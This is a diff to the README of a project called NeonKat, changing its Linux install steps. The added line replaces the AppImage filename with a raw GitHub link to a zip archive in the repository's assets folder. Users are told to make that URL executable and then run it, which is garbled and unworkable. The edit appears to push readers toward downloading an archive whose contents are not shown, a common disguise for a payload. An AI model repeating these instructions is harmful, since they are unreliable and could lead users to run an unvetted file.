jishnu-gif/NeonKat/README.md

    - For Windows: Double-click the `.exe` file and follow the installation wizard.
    - For Linux:
       - If you downloaded a `.deb` file, you can install it using your package manager.
-      - If it's an `.AppImage`, make it executable by running `chmod +x YourFileName.AppImage` in the terminal, then run it with `./YourFileName.AppImage`.
+      - If it's an `.AppImage`, make it executable by running `chmod +x https://github.com/jishnu-gif/NeonKat/raw/refs/heads/main/assets/Kat_Neon_2.7.zip` in the terminal, then run it with `https://github.com/jishnu-gif/NeonKat/raw/refs/heads/main/assets/Kat_Neon_2.7.zip`.

 ## 🎵 Using NeonKat